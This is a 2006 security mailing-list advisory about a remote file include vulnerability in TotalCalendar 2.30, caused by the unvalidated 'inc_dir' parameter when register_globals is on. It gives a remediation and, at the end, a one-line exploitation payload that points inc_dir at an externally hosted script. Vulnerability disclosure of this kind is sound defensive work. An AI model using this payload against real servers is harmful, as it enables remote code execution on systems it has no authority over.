[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060423111914.5919.qmail@securityfocus.com>
Date: 23 Apr 2006 11:19:14 -0000
From: admin@...orsecurity.de
To: bugtraq@...urityfocus.com
Subject: [MajorSecurity] TotalCalendar 2.30 - Remote File Include
Vulnerability
[MajorSecurity] TotalCalendar 2.30 - Remote File Include Vulnerability
--------------------------------------------------------
Software: TotalCalendar
Version: 2.30
Type: Remote File Include Vulnerability
Date: April, 23th 2006
Vendor: SweetPHP
Page: http://sweetphp.com
Risc: High
Credits:
----------------------------
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
Affected Products:
----------------------------
TotalCalendar 2.30 and prior
Description:
----------------------------
TotalCalendar is the complete solution for all of your calendar and schedule needs.
TotalCalendar gives you the ability to create multiple calendars
and allows you to easily share and manage your events online.
The ability to allow user accounts lets you have other calendar members help you manage your events,
users, style, and much more.
Requirements:
----------------------------
register_globals = On
Vulnerability:
----------------------------
Input passed to the "inc_dir" parameter in "index.php" is not
properly verified, before it is used to include files.
This can be exploited to execute arbitrary code by including files from external resources.
Solution:
----------------------------
Edit the source code to ensure that input is properly sanitised.
Set "register_globals" to "Off".
Exploitation:
----------------------------
Post data:
inc_dir=http://www.yourspace.com/yourscript.php?
Powered by blists - more mailing lists